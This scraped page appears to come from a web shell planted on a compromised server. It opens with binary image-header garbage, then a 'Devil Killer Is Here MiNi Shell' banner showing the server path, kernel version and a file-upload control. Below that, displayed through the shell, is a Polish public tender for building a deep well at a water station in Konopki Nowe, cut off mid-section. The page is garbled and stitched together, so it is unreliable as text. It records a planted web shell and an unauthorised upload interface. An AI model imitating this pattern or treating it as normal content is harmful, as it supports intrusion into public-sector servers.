JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240913/0049827801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Robota budowlana w trybie zaprojektuj i wybuduj budowa studni głębinowej na stacji uzdatniania wody w Konopkach Nowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Usług Komunalno - Rolnych Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510919530</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lipowa 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Miłki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-513</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 421 10 81</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pukrmilki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://pukr.gminamilki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Robota budowlana w trybie zaprojektuj i wybuduj budowa studni głębinowej na stacji uzdatniania wody w Konopkach Nowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8bbf792c-4200-4ada-bd44-d4c6857b2b6a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00498278</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00362429/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa studni głębinowej na stacji uzdatniania wody w Konopkach Nowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Dotyczy projektu Nr 00117-65150-UM1410076/22 pn. „Gospodarka wodno-ściekowa” w ramach poddziałania „Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii” objętego Programem Rozwoju Obszarów Wiejskich na lata 2014–2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.przetargi.gminamilki.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.przetargi.gminamilki.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym<br/>a Wykonawcami, w szczególności składanie ofert oraz oświadczeń odbywa się przy użyciu środków komunikacji elektronicznej<br/>zapewnionych przez Platformę ZETO PZP dostępny pod adresem https://www.przetargi.gminamilki.pl; zwany dalej<br/>Portalem/Platformą.<br/>1) We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>postępowania wskazanym w SWZ.<br/>2) Osobą uprawnioną do porozumiewania się z Wykonawcami jest – Maciej Czepaniewski, tel. 535 536 344.<br/>3) Nie udziela się żadnych ustnych i telefonicznych informacji, wyjaśnień czy odpowiedzi na kierowane do Zamawiającego zapytania<br/>w sprawach wymagających zachowania pisemności postępowania z zastrzeżeniem z art. 61 ust. 2 ustawy Pzp.<br/>4) W zakresie pytań technicznych związanych z działaniem systemu prosi się<br/>o kontakt pod numer 81 71 84 227, adres mailowy Help Desk ZETO Lublin to hd@zeto.lublin.pl<br/>5) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich<br/>użyciu zostały opisane<br/>w Regulaminie korzystania z usług Systemu (REGULAMIN KORZYSTANIA Z PLATFORMY ZETO PZP).<br/>6) Za datę przekazania i odbioru danych, w szczególności oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń oraz innych informacji przyjmuje się datę zapisania pliku na serwerze Systemu..<br/>2. Wykonawca zobowiązany jest do powiadomienia Zamawiającego o wszelkiej zmianie adresu poczty elektronicznej podanego w<br/>ofercie.<br/>3. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Pytanie należy wysłać za pośrednictwem Systemu.<br/>1) Zamawiający niezwłocznie, nie później jednak niż na 2 dni przed upływem terminu składania ofert udzieli wyjaśnień, pod<br/>warunkiem, że wniosek<br/>o wyjaśnienie treści SWZ wpłynie do Zamawiającego nie później, później niż na 4 dni przed upływem terminu składania ofert.<br/>2) W przypadku, gdy wniosek o wyjaśnienie treści SWZ nie wpłynął<br/>w terminie, o którym mowa w pkt 3.1. Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia<br/>terminu.<br/>3) Treść zapytań wraz z wyjaśnieniami Zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej<br/>prowadzonego postępowania https://www.przetargi.gminamilki.pl<br/>4) Zamawiający zaleca śledzenie strony internetowej w celu uzyskania aktualnych informacji dotyczących postępowania.<br/>5) W przypadku rozbieżności pomiędzy treścią niniejszej SWZ, a treścią udzielonych odpowiedzi, jako obowiązującą należy przyjąć<br/>treść pisma zawierającego późniejsze oświadczenie Zamawiającego.<br/>6) W uzasadnionych przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść SWZ. Dokonaną zmianę<br/>treści SWZ Zamawiający udostępni na stronie internetowej prowadzonego postępowania https://www.przetargi.gminamilki.pl<br/>7) Jeżeli w wyniku zmiany treści SWZ nieprowadzącej do zmiany ogłoszenia<br/>o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian<br/>w ofertach, Zamawiający przedłuży termin składania ofert poprzez zamieszczenie przedmiotowej informacji na stronie internetowej.<br/>8) Oferta, której treść nie będzie zgodna z warunkami zamówienia,<br/>z zastrzeżeniem art. 223 ust. 2 zostanie odrzucona. Wszelkie niejasności<br/>i obiekcje dotyczące treści zapisów SWZ należy wyjaśnić z Zamawiającym przed terminem składania ofert.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://www.przetargi.gminamilki.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie <br/>o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, względem osób fizycznych, od których zostaną pozyskane dane w sposób bezpośredni, Zamawiający informuje, że: <br/>	Administratorem Pani/Pana danych osobowych jest Przedsiębiorstwo Usług Komunalno-Rolnych Sp. z o.o. z siedzibą w Miłkach ul. Lipowa 23, tel.87 4211081,e-mail: pukrmilki@list.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się kontaktować w sprawach związanych z danymi osobowymi telefoniczne: <br/>87 555 93 55, e-mail: iodo@pukrmilki.pl<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego PUK-R.ZP.9/2024 prowadzonym w trybie podstawowym bez negocjacji;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy <br/>z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn. zm.), dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PUK-R.ZP 9/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 270000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Robota budowlana w trybie zaprojektuj i wybuduj budowa studni głębinowej na stacji uzdatniania wody w Konopkach Nowych:<br/>1)	Wykonanie dokumentacji geologicznej ujęcia 1 szt.<br/>2)	Wykonanie otworu studziennego 1 szt.<br/>3)	Montaż pompy głębinowej wraz z pompą 1 szt.<br/>4)	Wykonanie kompletnej obudowy studni 1 szt.<br/>5)	Wykonanie niezbędnych rurociągów wody surowej łączących projektowaną studnię z budynkiem SUW oraz niezbędnych instalacji elektrycznych 1 szt.<br/>6)	Wykonanie instalacji elektrycznych od studni głębinowej do budynku SUW 1 szt.<br/>7)	Wykonanie dokumentacji powykonawczej (hydrogeologicznej+operat wodnoprawny) wraz z badaniami fizyko-chemicznymi i bakteriologicznymi wody. 1 szt.<br/>8)	Sporządzenie map do celów projektowych w skali 1: 500, <br/>9)	Pozyskanie i weryfikację wszystkich danych niezbędnych do wykonania projektu oraz opracowanie mapy do celów projektowych w skali 1:500 dla obszaru objętego projektem; wykonanie, zgodnie z wymogami określonymi w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2000 r. Nr 106, poz. 1126 z późn. zm.), w tym Rozporządzenie Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego,<br/>10)	wykonanie badań geologicznych w celu znalezienia miejsca najkorzystniejszego dla usytuowania nowej studni głębinowej, <br/>11)	wykonanie projektu robót geologicznych, <br/>12)	wykonanie prace wiertniczych i badań hydrogeologicznych, <br/>13)	opracowanie wymaganej dokumentacji hydrogeologicznej ujęcia wody, <br/>14)	sprawowanie nadzoru geologicznego wykonania robót, <br/>15)	przeprowadzenie niezbędnych prób, badań laboratoryjnych, <br/>16)	opracowanie wymaganej dokumentacji hydrogeologicznej, <br/>17)	wykonanie pełnego zakresu robót ujętych w projektach, <br/>18)	zapewnienie pełnej obsługi geodezyjnej na etapie wykonawstwa robót, <br/>19)	wykonanie niezbędnych robót towarzyszących (np. zorganizowanie placu budowy, w okresie realizacji, biura, zaplecza budowy, uporządkowania terenu po pracach itp.), <br/>20)	uruchomienie oraz wykonanie rozruchu i przekazanie po uzyskaniu założonego efektu technicznego obiektu gotowego do eksploatacji, <br/>21)	dokonanie przeszkolenia personelu przyszłego użytkownika wybudowanych obiektów, <br/>22)	Instrukcje i oznakowania obiektów zgodnie z Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 01.10.1993r. w sprawie bezpieczeństwa i higieny pracy <br/>23)	usługi serwisowe w okresie gwarancyjnym - wymagany czas reakcji na usunięcie awarii - 24 godziny od momentu zgłoszenia. Wykonawca zobowiązany jest do podania formy zgłoszenia i potwierdzeniu przyjęcia zgłoszenia z podaniem osób odpowiedzialnych za potwierdzenie zgłoszenia, ich numerów telefonów, faksów i poczty elektronicznej (e-mail). <br/>24)	uzyskanie wszelkich opinii, uzgodnień, pozwoleń i innych dokumentów wymaganych przepisami szczególnymi, niezbędnych do uzyskania zgody na użytkowanie i eksploatację obiektu. <br/>25)	Wykonawca będzie przestrzegać praw patentowych i będzie w pełni odpowiedzialny za wypełnienie wszelkich wymagań prawnych odnośnie wykorzystania opatentowanych urządzeń lub metod i w sposób ciągły będzie informować Inżyniera o swoich działaniach, przedstawiając kopie zezwoleń i inne odnośne dokumenty.<br/>26)	Wykonawca, projektując i realizując opisany zakres robót, powinien uwzględnić fakt, że w czasie prowadzenia prac budowlanych, stacja uzdatniania wody musi zapewnić ciągłość pracy w celu zapewnienia ciągłości dostawy wody. Realizacja odbywać się będzie w trakcie funkcjonowania obiektów, stąd konieczność przyjęcia takiej kolejności robót i takiej organizacji, aby tego warunku dotrzymać. Jako podstawę opracowania projektów i wykonania robót należy przyjąć założenia i wymagania przedstawione w Programie Funkcjonalno-Użytkowym, które pod względem technicznym pozwolą uzyskać spodziewany efekt inwestycji. Rozwiązania projektowe, zastosowane materiały oraz jakość wykonanych robót powinny zapewniać wysoką trwałość i niezawodność oraz możliwość bezawaryjnej pracy w zmiennych warunkach eksploatacyjnych, możliwych do przewidzenia na etapie projektowania i robót budowlanych. <br/>27)	Dobór parametrów technicznych materiałów powinien być przeprowadzony w oparciu o analizę rzeczywistych warunków pracy.<br/>28)	Budowa studni głębinowej. Budowę studni głębinowej należy zaprojektować i wykonać na terenie Stacji Uzdatniania Wody tj. na działce nr 5/2 obręb Konopki Wielkie gmina Miłki. Obecnie na tym terenie znajdują się 2 studnie głębinowe : Studnia nr 2 rok 1973 , głębokość 55m, wydajność 18 m3/h przy depresji 25m Studnia nr 3 rok 1986, głębokość 54m, wydajność 31 m3/h przy depresji 14m,<br/>29)	W ramach zadania wykonawca jest zobowiązany do wykonania kompletnej gotowej do eksploatacji studni głębinowej o wydajności co najmniej 30 m3/h. <br/>30)	W ramach dokumentacji projektowej należy: <br/>a)	wykonać projekt robót geologicznych, <br/>b)	wykonać prace wiertnicze i badania hydrogeologiczne, <br/>c)	opracować wymaganą dokumentację hydrogeologiczną ujęcia wody, <br/>d)	uzyskać decyzje o środowiskowych uwarunkowaniach, <br/>e)	opracować operat wodnoprawny, <br/>f)	opracować wymaganą dokumentację obudowy studni, <br/>g)	zaprojektować obudowę studni, <br/>h)	zaprojektować odcinek instalacji wodociągowej, <br/>31)	Otwór studzienny <br/>a)	Wykonany techniką udarową, <br/>b)	Średnica min DN 250 z rur PVC-U pełnych <br/>c)	Filtr szczelinowy owinięty siatką stilonową, <br/>d)	Rury pompowe ze stali ocynkowanej kołnierzowe DN80, <br/>e)	Pompa głębinowa o wydajności dostosowanej do wydajności studni głębinowej oraz urządzeń SUW, <br/>32)	Obudowa studni głębinowej DN 2000 i H=2m z prefabrykatów żelbetowych z betonu klasy C35/45 zawierającą: <br/>a)	pokrywa studzienna wyposażona w dwa otwory: jeden do montażu/demontażu pompy głębinowej, drugi umożliwiający wejście,<br/>b)	drabinkę ze stali kwasoodpornej , <br/>c)	dennica studni z otworem na głowicę szybu oraz studzienką zbiorczą odwadniającą z rusztem ze stali nierdzewnej i jastrych ze spadkiem, <br/>d)	pompę odwodnieniową, <br/>e)	kominki wentylacyjne, <br/>f)	przepust kablowy,<br/>g)	dodatkowo oświetlenie w studni 12V – 2 punkty świetlne,<br/>h)	dodatkowo wykonać złącze kablowe na zewnątrz obudowy studni do podłączenia pompy głębinowej z gniazdkiem technicznym 230V,<br/>33)	Wyposażenie studni głębinowej min: <br/>a)	Głowica ze stali kwasoodpornej z rewizjami kontrolnymi, <br/>b)	Wodomierz, <br/>c)	zawór zwrotny, <br/>d)	manometr, <br/>e)	zawór czerpalny do pobierania próbek wody surowej, <br/>f)	zasuwę kołnierzową, <br/>g)	przepusty rurowe dla rurociągu tłocznego oraz przewodów elektrycznych sygnalizacyjnych, <br/>h)	hermetyczną rozdzielnię elektryczną oraz gniazdkiem 230V (na zewnątrz prz komorze), <br/>i)	rurkę piezometryczną do badania zwierciadła wody w studni głębinowej, <br/>j)	instalację elektryczną, <br/>k)	przenośna elektryczna taśma pomiarowa z sygnalizacją optyczną do pomiaru poziomu zwierciadła wody, <br/>34)	Instalację wodociągową wody surowej łączącą nowo powstałą studnię głębinową ze stacją uzdatniania wody należy wykonać z rur ciśnieniowych PE 100 RC SDR 17 średnicy min DN 90mm produkowanych zgodnie z normą: <br/>a)	PN-EN 12201-2+A1:2013-12 Systemy przewodów rurowych z tworzyw sztucznych do przesyłania wody oraz do ciśnieniowej kanalizacji deszczowej i sanitarnej -- Polietylen (PE) -- Część 2: Rury <br/>b)	PN-EN 12201-3+A1:2013-05 Systemy przewodów rurowych z tworzyw sztucznych do przesyłania wody oraz do ciśnieniowej kanalizacji deszczowej i sanitarnej -- Polietylen (PE) -- Część 3: Kształtki <br/>35)	Połączenia rurociągów PE wykonać za pomocą kształtek elektrooporowych PE100 PN 10 lub za pomocą zgrzewów doczołowych. Szczelność rurociągów ciśnieniowych powinna spełniać wymogi norm PN -70/B - 10715 oraz PN-B-10725<br/>36)	Próba szczelności powinna być wykonywana przy temperaturze nie niższej niż + 1⁰C na ciśnienie próbne 10 atm,<br/>37)	Zasilanie projektowanego ujęcia wody należy wykonać jako nowe przyłącze z istniejącej Stacji Uzdatniania Wody.<br/>38)	Stosować kable doziemne odpowiednie do mocy zainstalowanej pompy głębinowej.<br/>39)	Przy obudowie studni głębinowej wykonać skrzynkę rozdzielczą łączącą instalację doziemną z przewodem zasilającym pompę głębinową. W skrzynce zamontować bezpiecznik umożliwiający szybkie odłączenie pompy na czas prowadzonych prac remontowo eksploatacyjnych.<br/>Wszystkie elementy należy wykonać i uruchomić zgodnie z załączonym programem funkcjonalno-użytkowym – załącznik nr 7 swz. <br/>40)	minimalny okres gwarancji i rękojmi – 60 miesięcy. <br/>41)	wykonawca ustanowi kierownika budowy uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 roku - Prawo budowlane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się niżej opisanymi kryteriami:<br/>1)	Cena ofertowa brutto – „C” – waga kryterium (znaczenie): 60%<br/>Kryterium „Cena ofertowa brutto” rozpatrywana będzie na podstawie ceny /brutto/ za wykonanie przedmiotu 